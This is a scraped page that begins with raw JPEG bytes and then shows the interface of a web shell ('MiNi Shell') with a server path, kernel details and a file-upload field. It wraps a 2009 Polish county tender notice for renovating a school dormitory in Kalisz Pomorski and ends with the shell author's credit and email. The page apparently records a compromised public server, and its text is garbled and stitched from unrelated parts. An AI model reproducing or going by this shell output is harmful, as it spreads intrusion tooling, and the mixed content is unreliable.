JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090702/218836-N-2009.html

<p class="kh_header"><b>Drawsko Pomorskie: Remont internatu Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim, 
ul. Wolności 16.</b><br>
<b>Numer ogłoszenia: 218836 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Drawsku Pomorskim , Plac E. Orzeszkowej 3, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 094 3630788, faks 094 3630788.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatdrawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont internatu Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim, 
ul. Wolności 16..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu wewnątrz budynku internatu Zespołu Szkół Ponadgimnazjalnych w Kaliszu Pomorskim przy ul. Wolności 16.
 
Przedmiot zamówienia obejmuje:
 1   Przebudowa instalacji elektrycznej 
   Zakres prac obejmuje: 
instalacje elektryczne oświetleniowe ( w tym oświetlenie awaryjne i ewakuacyjne),
instalacje elektryczne gniazd tykowych, 
instalacje elektryczne gniazd komputerowych,
przebudowę tablic rozdzielczych budynku,
przebudowę wewnętrznej linii zasilającej (w tym wyłącznik główny p.poż.),
wykonanie badań skuteczności zerowania,
odłączenie istniejącej instalacji elektrycznej. 
Roboty należy wykonać zgodnie z dokumentacja projektową (załącznik nr 1do SIWZ) i ST (załącznik nr 2 do SIWZ).

2.	Przebudowa sanitariatów na parterze wraz z adaptacją pomieszczeń na umywalnie z natryskami, w tym m.in.:
wzmocnienie podłóg i wykonanie izolacji przeciwwilgociowej,
przemurowanie ścian,
wykonanie nowych instalacji wod. - kan. i c.o.,
montaż urządzeń i przyborów sanitarnych (kabina z natryskiem prysznicowym - 4 kpl., umywalka - 6 kpl., kabina wc - 2 kpl., ustęp - 2 kpl., - 2 kpl., kratki ściekowe - 2 szt., kratki wentylacyjne),
wyłożenie ścian - glazurą i podłóg - terakotą antypoślizgową,
montaż ościeżnic i skrzydeł drzwiowych (drzwi łazienkowe DZ- 90 - 2 kpl., dzwi do  pokoi DZ - 90 - 1 kpl., drzwi DZ łazienkowe - 70 - 1 kpl.),
roboty demontażowe wynikające z powyższej przebudowy. 

Szczegółowy zakres robót został określony w dokumentacji projektowej (załącznik nr 4 do SIWZ) i ST (załącznik nr 5 do SIWZ). Roboty należy wykonać zgodnie z wyżej wymienionymi dokumentami.
  

3.	Przebudowa sanitariatów na I piętrze wraz z adaptacją pomieszczeń na umywalnie z natryskami, w tym m.in.:
wzmocnienie podłóg i wykonanie izolacji przeciwwilgociowej,
przemurowanie ścian,
wykonanie nowych instalacji wod. - kan. i c.o.,
montaż urządzeń i przyborów sanitarnych (kabina z natryskiem prysznicowym - 4 kpl., umywalka - 5 kpl., kabina wc - 3 kpl., kratki ściekowe - 2 szt., kratki wentylacyjne),
wyłożenie ścian - glazurą i podłóg - terakotą antypoślizgową,
montaż ościeżnic i skrzydeł drzwiowych (drzwi łazienkowe DZ-90 - 2 kpl.),
roboty demontażowe wynikające z powyższej przebudowy. 

Szczegółowy zakres robót został określony w dokumentacji projektowej (załącznik nr 4 do SIWZ) i ST (załącznik nr 5 do SIWZ). Roboty należy wykonać zgodnie z wyżej wymienionymi dokumentami.
  

4.  Wykonanie instalacji wodociągowej przeciwpożarowej z montażem szafek  
        Hydrantowych. 

W zakresie prac m.in.: 
wykłucie poziomych i pionowych bruzd na rurociągi,
wykłucie wnęk na 2 hydranty,
montaż rurociągów z rur stalowych ocynkowanych,
montaż 2 kompletnych szafek hydrantowych wnękowych przeznaczonych do obiektów służby zdrowia lub uczelni.

Szczegółowy zakres robót został określony w dokumentacji projektowej (załącznik nr 4 do SIWZ) i ST (załącznik nr 5 do SIWZ). Roboty należy wykonać zgodnie z wyżej wymienionymi dokumentami.

5.	Wymiana klatki schodowej drewnianej (dotyczy całego budynku)

Należy zachować zasadę konstrukcji schodów oraz ich wyglądu ze względu na stanowisko Zachodniopomorskiego Urzędu Konserwatora Zabytków.
 W zakresie prac m.in. 
rozebranie istniejącej klatki schodowej,
montaż nowej klatki schodowej z drewna bukowego z zabezpieczeniem środkami ognioochronnymi oraz lakierowane lakierem wodorozcieńczalnym. 

Szczegółowy zakres robót został określony w dokumentacji projektowej (załącznik nr 4 do SIWZ) i ST (załącznik nr 5 do SIWZ). Roboty należy wykonać zgodnie z wyżej wymienionymi dokumentami.

6.	Ocieplenie ścian wewnętrznych - I piętro:
przygotowanie podłoża pod docieplenie metodą lekko-mokrą,
ocieplenie ścian styropianowymi, system STOPTER,
wykonanie wyprawy cienkowarstwowej z tynku mineralnego ATLAS CERMIT DR 30. 

7.	Wzmocnienie podłóg:
prace demontażowe istniejących elementów podłóg w tym zerwanie posadzek z tworzyw sztucznych, płytek terakotowych i cokolików z drewna,
przybicie do podłóg płyt wiórowych OSB - 2 warstwy,
wykonanie warstw niwelująco wyrównawczych,
wykonanie posadzek wraz z cokolikami, 
wykonanie posadzek z wykładzin z tworzywa sztucznego.

8.	Malowanie ścian i sufitów:
przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków       ze szpachlowaniem nierówności,
dwukrotne malowanie farbami olejnymi starych tynków z jednokrotnym szpachlowaniem,
układanie tapet utłaczanych z włókna szklanego na styk na sufitach i ścianach.

9.	Wyjście awaryjne:
rozebranie ścianek osłonowych z płyt pilśniowych,
montaż drzwi aluminiowych dwuskrzydłowych oszklonych.
 
10. Powstałe odpady i gruz w wyniku prowadzonych robót należy poddać utylizacji.  
         Koszt utylizacji ponosi Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Niepodlegający wykluczeniu z postępowania o udzielenie zamówienia.
  
2. Z ubiegania się o zamówienia publicznego wyklucza się Wykonawców, którzy:
2.1	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4,
2.2	podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych,
2.3	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji,
2.4	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
2.5	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych,
2.6	nie zgodzili się na przedłużenie okresu związania ofertą. 

3. Zamawiający odrzuca ofertę, jeżeli:
3.1	jest niezgodna z ustawą, 
3.2	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3,
3.3	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
3.5	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert,
3.6	zawiera błędy w obliczaniu ceny,
3.7	Wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. pkt 3 ustawy Pzp,
3.8	jest nieważna na podstawie odrębnych przepisów. 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 8 oraz Załącznik Nr 9 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
1)     konstrukcyjno-budowlanej, 
2) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatdrawski.pl w BIP.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
Pl. E. Orzeszkowej 3
78-500 Drawsko Pomorskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 12:00, miejsce: Starostwo Powiatowe
Pl. E. Orzeszkowej 3
78-500 Drawsko Pomorskie
pokoj 115 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com